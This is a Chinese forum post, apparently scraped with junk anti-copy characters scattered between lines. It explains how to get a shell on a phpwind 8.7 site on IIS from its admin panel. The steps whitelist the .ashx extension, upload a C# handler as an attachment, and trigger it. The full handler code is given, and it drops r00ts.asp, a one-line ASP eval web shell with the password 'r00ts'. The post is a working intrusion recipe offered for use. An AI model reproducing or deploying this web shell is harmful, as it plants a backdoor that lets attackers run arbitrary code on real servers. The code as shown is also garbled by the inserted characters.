phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
' m4 A# H& B; [. d' f- d
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
0 b( T* N2 W6 i6 w& V2 O! Z4 Z( P4 V2 X- l
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

& T" L6 g: D+ A6 b" z& H, [; Q然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
- @* F! _. C9 o1 R- l
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
8 S. c  c6 P7 ]- m2 _using System;
using System.Web;
: ]: V/ x8 e( b& Yusing System.IO;
. G0 X, m3 _) @( z3 qpublic class Handler : IHttpHandler {
( g+ X( F& Q! q9 G% Hpublic void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
- E% K9 U0 r1 F/ r! w7 @StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
1 W2 o2 m' }# X+ z+ sfile1.Flush();
1 i* B* O1 ~6 E$ b5 @, _# T( L& vfile1.Close();
, z. T: r5 K. c7 d/ n5 z% N" N3 E% C}
public bool IsReusable {
get {
return false;
% U, O$ C/ Y& e1 A" L0 ~7 d}
}
" L, j) D9 b8 a+ ^$ c" ?2 b- X: u}